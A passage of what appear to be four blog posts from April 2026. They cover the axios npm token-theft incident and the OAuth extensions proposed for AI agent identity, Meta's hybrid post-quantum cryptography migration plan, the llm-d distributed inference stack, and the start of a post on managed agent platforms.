March 29. The maintainer's device is compromised through a social channel. A browser session token for npm's publishing API is harvested from local storage. This is the moment OAuth broke. The session token was bearer-semantic — possession equals authority. MFA was theater because MFA had already happened at login; the token was minted post-MFA and had hours of lifetime remaining.

March 31. UNC1069 publishes axios@1.14.1 and axios@0.30.4 using the stolen token. npm's registry had no contextual check: new publish from a new IP, new user-agent, new geography, outside the maintainer's usual publishing cadence. With CAEP signals wired into npm's identity provider, the session could have been revoked at the first anomalous publish. Instead, the token was accepted because it was structurally valid.

April 1. Microsoft Threat Intelligence attributes the compromise to UNC1069. 150M weekly downloads already exposed.

Three OAuth extensions would have changed the outcome:

DPoP (RFC 9449) would have bound the session token to a key in the maintainer's browser. The harvested bearer token, lifted out of storage, would have been useless without the accompanying private key.
CAEP would have let npm's IdP push a revocation when Microsoft's EDR flagged the device as compromised on March 29 — two days before the malicious publish.
Token Exchange with short TTLs would have forced the publish operation to derive a short-lived, operation-scoped token, reducing the window of exploitability from "bearer token valid for hours" to "publish-scoped token valid for 30 seconds."

The broader point: MFA protects the login. It does not protect what happens after. Every identity layer that treats a session token as the end state is running the same risk Axios did. And agents, which by definition operate post-login for hours at a time, live entirely in that risk zone.

The six extensions agents demand

OAuth2 is not dead. But agents need six extensions layered on top of it before the protocol is usable at machine speed.

On-Behalf-Of (OBO). Originally a Microsoft extension, now widely supported. Lets a service exchange an incoming user token for a downstream token that preserves user context. Without OBO, an agent either impersonates the user (no audit trail) or acts as itself (loses user context). OBO is the minimum viable primitive for any agent that acts for a human.

Token Exchange (RFC 8693). The standardized, IdP-agnostic version of OBO, plus more. Supports subject_token + actor_token chains, so a multi-hop agent call preserves the full delegation chain. This is the spine of agent-to-agent delegation — every non-trivial agent architecture needs RFC 8693.

DPoP (RFC 9449). Demonstrating Proof-of-Possession. Binds a token to a key pair the client generates. Every request carries a signed proof. Stolen tokens become useless without the private key. If you adopt one thing from this list, adopt DPoP — it's the direct fix for the Axios class of attack.

PKCE (RFC 7636). Proof Key for Code Exchange. Mandatory for public clients (including agents running on user devices). Prevents authorization code interception. Already standard for mobile apps; must be standard for agents.

CAEP (OpenID Continuous Access Evaluation Profile). The revocation channel. IdP pushes signals — credential change, session revoked, device compromised, user disabled — to relying parties in real time. Without CAEP, token revocation is on the token-lifetime clock, which for agents is forever.

ABAC (Attribute-Based Access Control). Not a single spec but a category. Replaces coarse OAuth scopes with context-aware policy: agent identity + user identity + resource attributes + environmental attributes. OPA, Cedar, and Hexa are the open-source anchors. Without ABAC, you're back to the scope-string problem — an agent with write:files can write any file, forever.

Together these six don't replace OAuth; they rebuild OAuth into something appropriate for a world where identity traverses machines.

Trade-offs analysis

The core tension is token lifetime, and it resolves to a three-tier model — not a single answer.

Long-lived tokens (24h-7d) are tempting. Your agent grabs a token and runs. No refresh logic, no per-call latency. Operationally trivial. Axios is the counter-argument: one leaked token and the attacker has hours of authorized action. For any agent touching production, 24-hour tokens are indefensible.

Short-lived tokens (seconds-to-minutes) align with best practice. CAEP revocation actually works because the token rotates constantly. DPoP binding is cheap because the handshake is amortized across many requests. But two costs are real. First, IdP load — an agent making 10k requests/sec with 10-second tokens is issuing 1000 token exchanges per second. Your IdP needs to scale like a CDN. Second, latency — every hop adds a token exchange round-trip. For latency-sensitive agent chains (voice agents, trading agents), this shows up as user-visible lag.

The emerging consensus is tiered. Human-initiated actions get 5-60 minute tokens — the human is present, the session is interactive, rotation is a background concern. Agent-to-agent hops in a hot path get milliseconds-to-seconds lifetimes with DPoP binding — rotation is the point, revocation is instant, latency is managed through connection reuse. Background batch jobs get a third pattern: single-purpose, narrowly scoped, operation-bound tokens issued per task and discarded on completion.

Trust rings is the architectural frame. Think of your agent fleet as concentric rings. Inner ring: agents running inside your VPC, talking to your services. Tokens here can be slightly longer (minutes), DPoP-bound, with ABAC enforcement at the service mesh. Outer ring: agents calling third-party MCP servers or SaaS APIs. Tokens here are seconds-long, scoped to exactly one operation, and revoked on completion. The rings are not static — an agent can step from inner to outer mid-task, and the token regime changes with it.

Implementation insights

If you're architecting this today, three patterns are proving out in production.

Pattern 1 — Scoped carve-outs at the MCP boundary. Don't let agents call MCP servers with long-lived tokens. Insert a policy broker that receives the agent's intent, issues a single-purpose token bound to the specific tool invocation, and revokes it the moment the tool returns. Teams doing this report MCP-server blast radius dropping from "everything the agent can do" to "the one operation this call authorized."

Pattern 2 — Audit breadcrumbs via Token Exchange chains. When agent A exchanges its token for a downstream call to agent B, the resulting token carries both subject_token (the original human) and actor_token (agent A). Logging the full chain at every hop gives you a reconstructable audit trail: "at 03:14:07, user X's intent was carried by planner Y and executed by tool Z on resource R." Without this, agent mesh logs are a puddle of service-account IDs.

Pattern 3 — CAEP-wired IdP with ITDR. Wire your IdP's CAEP signals to your ITDR (Identity Threat Detection & Response) platform and back. Anomaly in agent behavior → ITDR alert → CAEP revoke → all downstream tokens invalidated within seconds. Gartner-referenced data shows ITDR adoption correlates with a 70% reduction in identity-based attack success rates. The Axios-class compromise is exactly what ITDR exists to catch before it propagates.

Actionable takeaways for Q2 2026

Inventory every agent with identity access by May 1. You cannot govern what you cannot count. 91% of enterprises have agents; 10% know where they are. Start with IdP logs filtered by non-human user agents.
Enable CAEP on your primary IdP this quarter. Okta, Entra, and Auth0 all ship it. The integration work is small; the revocation-latency reduction is enormous.
Migrate every agent-to-service call to RFC 8693 Token Exchange. No more client_credentials shortcuts. The audit chain is the payoff.
Ship DPoP on at least one high-value agent path. Start with the path that would cause the biggest Axios-shaped headline if compromised. Bind the tokens. Prove the flow.
Deploy ITDR and connect it to CAEP. Make the revocation loop closed and automatic. Humans cannot revoke at agent speed.

Meta's Post-Quantum Crypto Migration Playbook

Anil Kurmi — Sun, 19 Apr 2026 08:26:13 +0000

Picture a Meta security engineer on April 15, 2026, sitting on a Slack thread with the TLS team. The draft blog post is ready for legal review. Someone asks the question everyone is avoiding: "Can we say what percentage of traffic is actually PQ-protected?" Silence. Then: "Let's just say 'significant portions of our internal traffic.' Ship it."

That hedge made it into the published post on April 16. For the world's second-largest CDN, "significant" is a word you pick when the real number is either embarrassingly small or operationally terrifying to disclose. Either way, the vagueness is the signal. Post-quantum cryptography migration is harder in production than any vendor slide deck admits, and Meta just published the most honest playbook we have.

I read the whole thing twice. Here is what it actually says, what it refuses to say, and what you should do about it before your CNSA 2.0 deadline crashes into you in nine months.

5-Minute Skim: What changed this week?

Meta published a real migration framework on April 16, 2026. Six steps, specific algorithm recommendations, and a refreshingly honest threat model. Not marketing — a playbook.
Default recommendation: hybrid, not pure-PQ. ML-KEM768 for key exchange paired with X25519. ML-DSA65 for signatures paired with ECDSA. HQC as a hedge.
What breaks in production: middleboxes that can't handle a 1,184-byte ClientHello extension, CAs that don't yet issue hybrid certs at scale, and firmware that ships with pinned classical verifiers.
Key trade-off: hybrid doubles your handshake surface area but keeps you safe if either ML-KEM or X25519 falls. Pure-PQ is lighter but puts all your faith in lattice math that is barely five years into peer review.
Bottom line: If you have not started your PQC inventory, the CNSA 2.0 deadline (January 1, 2027) is already inside your planning horizon.

Why does this week matter for PQC?

Three things converged between April 13 and 19.

First, Meta broke its silence. Until now, the big PQC voices were Cloudflare, Google, and AWS — companies whose threat models are public and whose customers demand transparency. Meta's internal traffic is a black box. When they publish a framework, they are signaling that the migration has moved past the "interesting research" phase into "we are burning real engineering quarters on this."

Second, CNSA 2.0's January 1, 2027 deadline is nine months away. That is the US government's Commercial National Security Algorithm Suite 2.0 requirement, and it cascades. If you sell to federal agencies, you need PQC. If you sell to companies who sell to federal agencies, you need PQC. If you process data that might touch a regulated industry, your auditors are going to start asking about PQC readiness this year.

Third, the industry wave is visible now. Cloudflare reported 16% of human requests PQC-protected back in 2024 and is ramping to majority share. Akamai flipped the default to hybrid ML-KEM+X25519 for all customers in February 2026. AWS's s2n-tls has production PQ key exchange. Microsoft shipped PQC APIs GA on Windows Server 2025, Windows 11, and .NET 10. Google's Android 17 stable release in June 2026 will carry ML-DSA in the boot chain. Everyone is on the same clock.

What did Meta actually choose?

Meta's framework rejects pure-PQ and commits hard to hybrid. That choice deserves unpacking because it is the single most consequential architectural decision in the post.

For key exchange: ML-KEM768 wrapped with X25519. Both run in parallel during the TLS handshake. The session key is derived from both shared secrets, so an attacker has to break both schemes to decrypt the traffic. ML-KEM (formerly Kyber) is the NIST FIPS 203 standard; it is a lattice-based key encapsulation mechanism whose security rests on the hardness of the Module Learning With Errors problem.

For signatures: ML-DSA65 (FIPS 204) paired with ECDSA. Same logic — a forger needs to break both. ML-DSA is another lattice construction, and while signatures are less urgent than KEX for "harvest now, decrypt later" attacks, they matter enormously for firmware and supply-chain trust.

As an algorithmic hedge: HQC (Hamming Quasi-Cyclic). This is code-based, not lattice-based. Meta explicitly flags that if some clever cryptanalyst finds a structural weakness in Module-LWE over the next decade, the entire lattice family collapses together. HQC uses completely different math, so it is insurance against a category-level break.

Size guidance: stick with the 768/65 variants unless performance forces you smaller. The 512-bit variants exist for embedded and constrained devices, but on general-purpose servers the ~2.5% handshake overhead is worth the extra margin.

The important detail is the parallel derivation. Both shared secrets feed a key derivation function, and the output is the session key. An attacker with a future quantum computer can crack X25519 but still faces ML-KEM. An attacker with a lattice-cryptanalysis breakthrough cracks ML-KEM but still faces X25519. You fail only if both fall, which is the whole point of defense in depth.

What is the operational reality nobody wants to discuss?

Here is where Meta's framework gets honest and where your production rollout is going to bleed.

Middlebox intolerance is the silent killer. Adding ML-KEM public keys to the ClientHello balloons the extension by roughly 1,184 bytes. That pushes the ClientHello past the first TLS record boundary, forcing fragmentation. Corporate firewalls, load balancers, and "next-gen" inspection appliances from 2015-2019 often drop or mangle fragmented ClientHellos. Cloudflare spent five years (2019-2024) ramping PQC incrementally precisely because of this. They documented cases where a single misbehaving middlebox would break 2-3% of a customer's traffic in ways that looked like random TLS errors. You cannot fix this centrally. You have to detect, attribute, and either upgrade the middlebox or carve out a fallback path.

Performance degrades sharply under packet loss. In ideal network conditions, the extra bytes cost you under 2.5% of handshake time and somewhere between 5-15% of page load time. On a clean fiber link you will barely notice. But under 3% packet loss, the larger handshake means more retransmissions, and latency balloons to 32% over the classical baseline. Mobile users on congested cell networks are going to feel this. Your p99 is going to look worse before it looks the same.

The CA bottleneck is real. Public CAs are understaffed for hybrid certificate issuance. AWS Certificate Manager opened hybrid support in 2025 and discovered that legacy validators silently failed on the dual-signature certificate chain. The chain parses, but the second signature is ignored, so you think you have PQC protection when you don't. Hybrid cert issuance windows are opening at major public CAs in Q3 2026, but availability at scale will lag into 2027. If your application depends on client certs or mTLS, plan for a long tail.

Firmware is the worst deployment target. Google's Android 17 rollout for ML-DSA in bootloader validation required 12-18 months of OEM coordination even with a single company driving the schedule. Every handset SoC has its own secure boot chain. ROM-baked classical verifiers cannot be patched. If your product ships with long-lived firmware — IoT, automotive, industrial — you are looking at multi-year lead times, and anything already shipped is effectively stuck on classical signatures until hardware refresh.

Is the harvest-now-decrypt-later threat actually real?

Yes, and this is the slide your CISO needs to show the board.

The threat model is simple. An adversary records encrypted traffic today. They store it cheaply — at a few cents per gigabyte, even nation-state-scale capture is operationally feasible. They wait. When a cryptographically relevant quantum computer comes online, they decrypt retroactively. Your TLS key exchange from 2026 is readable in 2035 or 2040.

This is not a speculative framing anymore. The US Department of Homeland Security, the UK's NCSC, the EU's ENISA, and the Australian Cyber Security Centre have all published guidance that treats harvest-now-decrypt-later as a documented, active risk. HashiCorp's write-up frames it clearly: you are not protecting against tomorrow's interception, you are protecting yesterday's already-captured traffic that has a decade or more of shelf life.

Which data actually matters?

Intellectual property that retains value for 10+ years: pharmaceutical research, unreleased product designs, trade secrets.
Diplomatic and intelligence communications with effectively infinite sensitivity.
Healthcare records that are protected under HIPAA for the patient's lifetime.
Financial and legal data with 7-30 year retention requirements.
Personally identifiable information that will embarrass you on tomorrow's front page regardless of when it was captured.

Insurers are pricing this now. Several cyber-insurance carriers have started requiring PQC roadmaps as part of underwriting renewals in 2026. Regulators — especially in financial services and healthcare — are treating absence of a migration plan as failure to meet the reasonable standard of care. If you get breached in 2030 and your 2026 traffic is decrypted, "we hadn't gotten to PQC yet" will not hold up in litigation.

Hybrid versus pure-PQ: which side wins?

This is the live debate inside every security team, so let me lay out the argument honestly.

The pure-PQ camp says hybrid is a transitional crutch. Lattice cryptography has been studied for three decades. ML-KEM went through multiple rounds of NIST competition with hundreds of cryptanalysts hammering at it. Every year you run hybrid, you pay double — double the handshake bytes, double the CPU, double the code to maintain. If you trust the standardization process, commit and move on.

The hybrid camp — which includes Meta, Cloudflare, Akamai, AWS, and basically everyone running production at scale — says the lesson of cryptographic history is humility. RSA looked bulletproof in 1994. SHA-1 was safe until it wasn't. Lattice crypto at production scale is new. Five years of serious deployment scrutiny is not enough. The extra bytes and CPU are cheap insurance. And critically, hybrid lets you fail safe if either family is broken, rather than fail catastrophically if the one you bet on is broken.

My read: hybrid wins for the next five to seven years, then the argument flips. Once ML-KEM and ML-DSA have a decade of adversarial review behind them and no structural weakness has emerged, dropping the classical side becomes defensible. Until then, hybrid is the correct default.

One more point the pure-PQ camp underweights: algorithm agility matters more than algorithm choice. Whatever you deploy in 2026 should be swappable via configuration, not a code change. If HQC needs to replace ML-KEM in 2032 because somebody publishes a Module-LWE break, you want that to be a config push, not a six-month engineering project.

What are the implementation gotchas?

Meta's six-step framework is: Prioritize → Inventory → External deps → Implement → Guardrails → Integrate. Each step has a trap.

Prioritize by data shelf life, not by traffic volume. The chatty internal telemetry service that carries gigabits of ephemeral metrics is lower priority than the boring admin API that handles customer PII with 7-year retention.

Inventory is where most teams discover they do not actually know what crypto runs where. Every TLS endpoint, every signed artifact, every encrypted field in a database, every JWT-signing service, every mutual-TLS service mesh. Build the asset graph before you write a line of migration code. Meta's framework spends real time on this for a reason.

External dependencies are the scary part. You control your own services. You do not control the SaaS vendors, payment processors, identity providers, and partner APIs in your dependency graph. Start the vendor PQC roadmap conversation now. Many will not have answers, and that is itself useful signal about which partners are serious.

Implement with hybrid from day one. Do not deploy classical-only into a system you plan to PQC later — you will end up doing the migration twice.

Guardrails means feature flags, gradual rollout, and the ability to instantly disable PQ if middlebox incompatibility surfaces. Cloudflare's five-year ramp worked because they had per-customer, per-edge-location toggles.

Integrate PQC into the normal SDLC so new services are born PQ-native. Otherwise you are signing up for a perpetual migration.

Anti-patterns I am seeing:

Treating PQC as "a TLS thing." It is also a signature thing, a long-lived-key thing, and a firmware thing. TLS is just the loudest.
Waiting for "the standard to settle." ML-KEM and ML-DSA are standardized. The waiting game is done.
Deploying pure-PQ for performance reasons without accepting the risk. If perf is that tight, fix the perf path, don't drop the hybrid protection.
Ignoring the deployment order. TLS endpoints first (fast to roll out, high value for HNDL defense), then long-lived data encryption keys (medium complexity, enormous value), then signatures (slowest, requires firmware and PKI coordination).

What should you actually do this quarter?

Five concrete actions for the next 90 days:

Run the crypto inventory. Every TLS endpoint, every signing service, every long-lived encrypted data store. If your team cannot produce this list in a week, that gap is your first finding.
Pick your algorithm pair. Default to ML-KEM768 + X25519 for key exchange and ML-DSA65 + ECDSA for signatures. Document the decision and the hedge plan (HQC) in an ADR.
Audit your middleboxes. Run synthetic ClientHello traffic with PQ extensions through every load balancer, firewall, WAF, and inspection appliance in your path. Log every failure. This is the #1 thing that will break your rollout.
Start the vendor conversation. Email every critical SaaS and infrastructure vendor asking for their PQC roadmap and target hybrid-cert support date. The non-responders become your risk register.
Write the board-level HNDL brief. One page. What data has 10+ year shelf life, what the threat model is, what the CNSA 2.0 deadline means for the business, and what your 2026-2027 investment is. Get the budget conversation started now, because you will need it.

LLM-D Launches: Kubernetes-Native Distributed Inference

Anil Kurmi — Sun, 19 Apr 2026 08:25:24 +0000

It's Tuesday afternoon. An SRE at a mid-sized fintech is staring at a P90 latency dashboard that just flipped from a calm 0.5 seconds to an ugly 8 seconds. Same GPU fleet. Same model. No traffic spike. Every pod shows 40% utilization. The on-call channel is a blizzard of "rolling back?" messages.

The actual bug: customer A's 6,000-token system prompt was sitting warm in HBM. Customer B arrived, the scheduler promoted B's prefix into HBM, and A's cache got evicted down to DRAM. The next time A came back, the router — blind to where A's prefix had actually gone — sent the request to a pod that now had to pull the prefix from a slower tier. P90 went 16× off a cliff while the capacity graph stayed flat.

This is the "cache partition cascade." It's the exact bug the llm-d project, announced this week as a CNCF Sandbox project, is built to eliminate. And it's the reason your token bill is about to flip 180° — if you understand it.

5-Minute Skim

What changed: llm-d — a Kubernetes-native distributed inference stack — landed in the CNCF Sandbox backed by Google Cloud, Red Hat, IBM, NVIDIA, CoreWeave, AMD, Cisco, Hugging Face, Intel, Lambda, and Mistral AI. The v0.5 release validated 3.1k tokens/sec per B200 on decode and 50k tokens/sec on a 16×16 B200 topology.

Default recommendation: If you run self-hosted vLLM at scale and your workloads share long prefixes (support bots, ads ranking, legal Q&A, agents), adopt llm-d. If you do one-shot inference with unique prompts, stay on vanilla vLLM — the disaggregation overhead won't pay for itself.

What breaks: The naive "one-pod-per-replica" vLLM deployment. Cache-hit economics completely dominate; if you aren't measuring prefix-cache hit rate per tenant, you are flying blind. Also breaks: any mental model where "more GPUs = lower latency." llm-d showed a 57× TTFT improvement with the same 16 H100s.

Key trade-off: llm-d gives you 25-70% higher throughput and 10× cheaper cached tokens ($0.30 vs $3.00 per million) — but you inherit a scheduler, a multi-tier KV cache, and a transport layer (NIXL/UCCL) you now have to operate. Managed services like Bedrock hide all of that; you pay for the hiding.

Why did this hit the wires this week?

Two things converged. First, llm-d formally entered the CNCF Sandbox on April 13 with a coalition that spans every major compute supplier — hyperscalers, chip vendors, neocloud operators, model labs. That's unusual. Kubernetes itself didn't launch with that kind of cross-vendor consensus.

Second, the economic pressure became impossible to ignore. Meta published two pieces this week — "Capacity Efficiency at Meta" on April 16 and "KernelEvolve" on April 2 — describing AI agents that claw back hundreds of megawatts of capacity from existing fleets through automated infrastructure optimization. KernelEvolve alone reported a 60% throughput gain on the Andromeda ads model. When Meta's own ML infrastructure team is sending agents to rewrite CUDA kernels, the industry message is clear: inference is now a capacity-efficiency problem, not a model-quality problem.

AMD's MLPerf 6.0 results dropped in the same window — the MI355X posted 1.08-1.2× uplift, and for the first time competitive inference numbers exist outside the NVIDIA stack. A Kubernetes-native, hardware-neutral control plane suddenly has much bigger stakes.

What does llm-d actually do?

Three moves, each non-obvious, each compounding.

Move one: disaggregate prefill from decode. A transformer inference request has two phases. Prefill processes the input prompt in parallel — it's compute-bound and loves fat GPUs. Decode generates tokens one at a time — it's memory-bandwidth-bound and wastes compute. Running them on the same pod means your decode phase starves a prefill-optimized GPU, or your prefill phase bottlenecks a decode-optimized one. llm-d splits them onto separate pools: prefill pods (typically 8) and decode pods (typically 16), connected via a high-speed transport.

Move two: multi-tier KV cache. Every token you generate needs the model's attention over every previous token — the "KV cache." For a 6K-token prompt, that cache is hundreds of megabytes per request. llm-d stores it across a hierarchy: HBM (fastest, scarcest) → DRAM (10× cheaper, 5× slower) → NVMe (100× cheaper, 50× slower) → distributed storage. The NIXL protocol moves cache blocks between tiers on demand. Cache hits in HBM cost you $0.30 per million tokens. Misses that fetch from cold storage cost $3.00. Same model, same request — 10× cost delta driven entirely by where the prefix lives.

Move three: scheduler-aware routing via Kubernetes Gateway API. The scheduler doesn't just know which pod is healthy. It knows which pod holds which prefix in which tier. When a request arrives with a known prefix, it routes to the pod that already has the KV cache warm. When no pod does, it routes to minimize transfer cost. The Gateway API integration means this is a first-class Kubernetes concept, not a sidecar hack.

Underneath, llm-d still runs vLLM — PagedAttention, continuous batching, OpenAI-compatible API. It's not a replacement. It's the control plane vLLM always needed.

Five nodes, one story: the gateway sees the request, picks a prefill pod with (or near) the warm cache, hands the KV state to a decode pod over NIXL, and tiers inactive cache to cheaper memory. No node does two jobs.

What do real deployments look like?

Meta Capacity Efficiency (April 16). Meta deployed unified AI agents across its fleet that analyze traces, propose kernel rewrites, and re-partition workloads. The reported recovery: hundreds of megawatts. Not a model improvement — a scheduling and kernel-fusion improvement on existing silicon. This is the same philosophy llm-d exposes to the rest of us: the gains live in the scheduler and the memory hierarchy, not the chip.

Meta KernelEvolve (April 2). A "ranking engineer agent" that optimizes CUDA kernels for the Andromeda ads model. 60% throughput gain. Meta's takeaway: human engineers can't explore the kernel search space fast enough, and the kernels evolve faster than the model does. For llm-d users, the corollary is that you want a control plane that can swap kernels and routing rules without a redeploy. llm-d's Kubernetes-native design lets you do exactly that via CRD updates.

DeepSeek-V3 in production. Running on H200 with vLLM plus Wide-EP (wide expert parallelism), DeepSeek reported 2.2k tokens/sec per H200 and a 40% per-token latency reduction. The Wide-EP trick — spreading MoE experts across many GPUs — only works with a scheduler that understands which expert lives where. That is exactly what llm-d formalizes.

AWS disaggregated inference. AWS published a post on April 15 introducing disaggregated inference on EKS powered by llm-d. Same primitives, different cloud. The coalition is real.

The Cache Partition Cascade

Here's the war story in full, because the numbers matter.

An enterprise customer running llm-d v0.4 — pre-fix — deployed 8 prefill pods and 16 decode pods on 16 H100s. Workload: multi-tenant customer support. Average context: 6K tokens of system prompt plus ~500 tokens of conversation history. Classic cache-hit workload.

Monday, 14:00. Customer A's 6K prefix fills HBM on prefill pod #3. TTFT for A: 540ms. Beautiful.

Monday, 14:12. Customer B arrives. B's prefix is different but similar in size. The scheduler, correctly, promotes B into HBM on pod #3 — B is active, A has gone quiet. A's KV cache is evicted down to DRAM.

Monday, 14:14. A sends a follow-up. Here's the bug: the scheduler routed A's follow-up to pod #3 because the prefix hash still pointed there. But pod #3 no longer had A's cache in HBM — it was two tiers down. The pod had to fetch the KV blocks back over NIXL, rebuild the attention state, and only then start decoding. TTFT for A's follow-up: 8.6 seconds. 16× degradation.

Meanwhile, the GPU utilization graph stayed at a comfortable 40%. The SLO breached. Capacity planning said everything was fine.

The v0.5 fix (shipped April 2026) does three things:

Cache-aware LoRA routing. The scheduler now tracks which tier holds each prefix, not just which pod.
Inline cost function. HBM hit beats DRAM hit beats miss-plus-fetch. The scheduler scores candidates on expected latency, not just locality.
UCCL-based transport HA. The NIXL fallback path no longer stalls when a peer pod is evicting; it fails over to a replica tier.

Post-fix, the same workload's P90 dropped to 620ms under identical tenant churn.

Lesson: in disaggregated inference, your scheduler's world-model of the cache is the system. Lie to it — or let it go stale — and no amount of GPU capacity saves you.

How does llm-d compare to Ray Serve, Modal, and Bedrock?

I've seen teams pick each. Here's how the debate actually runs.

llm-d vs Ray Serve. Ray Serve is a general-purpose Python serving framework — it can host anything callable. That generality is the cost. Ray has no native concept of prefill/decode split, no KV-cache tiering, no prefix-aware routing. You can build those on top, and plenty of teams have, but you're building the llm-d feature set by hand. If your workload is LLM-dominated, llm-d starts you 18 months ahead. If you're serving a zoo of ML models — rankers, embeddings, a few LLMs — Ray stays competitive because the LLM isn't the only customer.

llm-d vs Modal. Modal's pitch is per-second billing and zero ops. That's seductive until you realize inference traffic is rarely bursty enough to benefit. Customer support bots, ads serving, legal Q&A — these run a steady baseline 24/7. Modal's economics collapse above 50 concurrent users because you're paying a premium for elasticity you aren't using. Modal remains excellent for experimentation, nightly eval jobs, and genuinely bursty workloads (batch document processing, overnight agents). For steady-state production serving, llm-d on reserved capacity wins on pure $/token.

llm-d vs AWS Bedrock. Bedrock hides everything — no scheduler to tune, no KV cache to partition, no pods to patch. You pay a roughly 2-3× premium over self-hosted llm-d on equivalent hardware. For teams without a dedicated ML infra function, that premium is cheap. For teams burning >$100K/month on inference, llm-d pays back the ops cost in weeks. The split point is roughly where you'd hire a dedicated ML infra engineer anyway.

The honest answer: llm-d wins when (a) you have cache-reusable workloads, (b) you have the operational muscle to run Kubernetes plus a specialized control plane, and (c) your token volume makes the hiring math work. Below that threshold, managed services aren't stupid — they're correct.

When should you adopt, and when should you skip?

Adopt if:

Your prefix-cache hit rate (measure it today on vanilla vLLM) is above 30%. Support bots, ads, agents, and RAG systems routinely hit 60-80%.
Your average context is over 2K tokens. Cache tiering only earns its keep when the cached state is worth paging.
You run at least 8 GPUs in a single inference fleet. Below that, the disaggregation overhead dominates.
You already run Kubernetes in production. llm-d assumes you're fluent with CRDs, Gateway API, and pod-level networking.

Skip if:

Your workloads are one-shot — every prompt is unique. Cache tiering is dead weight; stick with vLLM's built-in scheduling.
You have fewer than 4 GPUs. The orchestration cost exceeds the throughput gain.
You don't have an on-call team that understands GPU memory hierarchies. When the cache cascade hits, you need someone who knows what NIXL is.
You're on pre-H100 hardware. The cache-tier bandwidth assumptions don't hold.

A middle path: run llm-d as a pilot on one workload — preferably your highest cache-hit workload — for a quarter before committing. v0.5 is stable, but the operational playbook is still being written in public.

Actionable takeaways

Measure prefix-cache hit rate per tenant this week. If you're on vLLM, this is a Prometheus scrape away. It's the single number that predicts your llm-d ROI.
Alert on cache-tier residency, not just GPU utilization. The cache cascade was invisible on GPU graphs. Build a dashboard for HBM/DRAM/NVMe occupancy and eviction rate.
Separate prefill and decode traffic in your load tests. If you test with a single request type, you'll miss the disaggregation economics entirely.
Budget for NVIDIA BlueField-4 (H2 2026). NVIDIA's CMX platform extends the cache hierarchy to 4 tiers with 5× sustained TPS on long-context agentic workloads. If your roadmap includes 100K+ context agents, plan the hardware refresh now.
Pilot llm-d on one high-cache-hit workload this quarter. Don't rip-and-replace. Prove the economics on one tenant, then expand.

Deep Dive Resources

Google Cloud: Enhancing vLLM for distributed inference with llm-d — The architectural overview with benchmark methodology.
llm-d on GitHub — Source, CRDs, and the v0.5 release notes with the cache-aware routing fix.
AWS: Disaggregated inference on AWS powered by llm-d — EKS deployment walkthrough.
Meta Engineering: Capacity Efficiency at Meta — The "hundreds of megawatts" story.
NVIDIA: BlueField-4 Inference Context Memory Storage — Where the 4-tier cache hierarchy is going in H2 2026.

Sources & Attribution

Google Cloud Blog, "Enhancing vLLM for distributed inference with llm-d," April 2026
Meta Engineering Blog, "Capacity Efficiency at Meta," April 16, 2026
Meta Engineering Blog, "KernelEvolve," April 2, 2026
AWS ML Blog, "Introducing disaggregated inference on AWS powered by llm-d," April 2026
NVIDIA Developer Blog, "Introducing NVIDIA BlueField-4," April 2026
llm-d GitHub repository, v0.5 release notes
MLPerf Inference 6.0 results, April 2026
DeepSeek-V3 production deployment reports, April 2026

The Great Agent Platform Consolidation: Why I'm Rethinking My $9 Side-Project Agent

Anil Kurmi — Sun, 19 Apr 2026 08:23:52 +0000

On Wednesday night I sat staring at two deploy buttons. One was my scrappy LangGraph agent running on a $9/month VPS — duct-taped together with Redis for memory, a homegrown sandbox I'd written three weekends ago, and a credentials file I still felt bad about. The other was Anthropic's new Managed Agents dashboard, asking me for $0.08 per runtime-hour. That's about $58/month if I left it on 24/7. Six times more expensive.

I pressed the managed one.

Not because I'd gone soft. Because I'd just finished writing a 400-line retry loop to handle a sandbox that kept OOMing on long tool calls, and Anthropic was offering to delete that file from my life. Three to six months of infrastructure work, gone. That's the pitch of the week, and it's working — but it comes with a trade none of the launch posts want to talk about.

This week — April 13-19, 2026 — wasn't just another product cycle. It was the week the agent platform wars turned into a platform consolidation. Three simultaneous launches, one new Linux Foundation project, and one quiet market share number that tells you who's actually winning.

The 5-Minute Skim

What changed this week: Anthropic launched Managed Agents (flat $0.08/runtime-hour, April 8). OpenAI updated its Agents SDK with sandbox execution, long-horizon tasks, and multi-provider support (April 15). The Agentic AI Foundation formalized under the Linux Foundation with Anthropic, OpenAI, and Block as founding members. Claude Opus 4.7 shipped the same week with advanced SWE capabilities.
The number nobody's quoting: OpenAI's share of enterprise LLM API spend has dropped from ~50% in 2023 to 27% in 2026. Market share is following openness, not coordination features. Anthropic gained by not building a walled garden.
Default recommendation: If you're a team of 1-5 shipping in under a quarter, use Anthropic's Managed Agents. If you're a platform team that already runs its own infra, use OpenAI's Agents SDK with BYO sandbox. Only pick LangGraph/CrewAI if you genuinely need graph-level control of the orchestration — most teams don't.
Failure mode to expect: Over-permissioned agents, credential sprawl, and skill-package supply-chain attacks (see: the "OpenClaw" incident below). State management fails first; observability fails second.
The trade-off: Managed platforms hide the hardest problems (state, credentials, governance) behind the "enterprise tier" bill. DIY forces you to solve them. There is no free option — you pay in dollars or you pay in on-call pages.

Why did three platforms ship agent runtimes in the same week?

This didn't happen by accident. The vendors have been watching the same graph: enterprise agent deployments went from demo toys in 2024 to real production workloads in 2025, and every one of them bled budget on infrastructure no one wanted to maintain. Teams were writing their own sandbox runners, their own memory stores, their own session replay — five times over, badly.

On April 8, Anthropic shipped Managed Agents as a public beta. The pitch is ruthless: $0.08 per runtime-hour, flat. No CPU tiers, no memory tiers, no per-tool-call charges. The harness — memory, sandbox, state persistence, session logs, tool orchestration — is all included. They claim it compresses three to six months of infra work into an afternoon, and having just spent three weekends on a sandbox, I believe them.

One week later, on April 15, OpenAI pushed a major Agents SDK update. Instead of running the sandbox themselves, they let you plug in E2B, Modal, Cloudflare, or Vercel. Python-first. Long-horizon tasks. Filesystem tools. The strategy is visibly different: OpenAI wants to be the coordination layer, not the runtime. "Bring your own everything — we'll orchestrate."

The same week, Anthropic shipped Claude Opus 4.7 with stronger SWE-bench numbers, and the Agentic AI Foundation (AAIF) was formalized under the Linux Foundation. Founding members: Anthropic, OpenAI, Block. Platinum sponsors: Google, Microsoft, AWS, Bloomberg, Cloudflare. MCP — which hit 97M+ monthly downloads and 10,000+ servers — was donated to AAIF along with Block's goose framework and the AGENTS.md spec (now adopted by 60,000+ OSS projects).

In other words: the protocols went neutral. The runtimes went proprietary. Pick your side.

Three approaches, told as a story

Imagine three teams, all trying to ship the same customer-support triage agent.

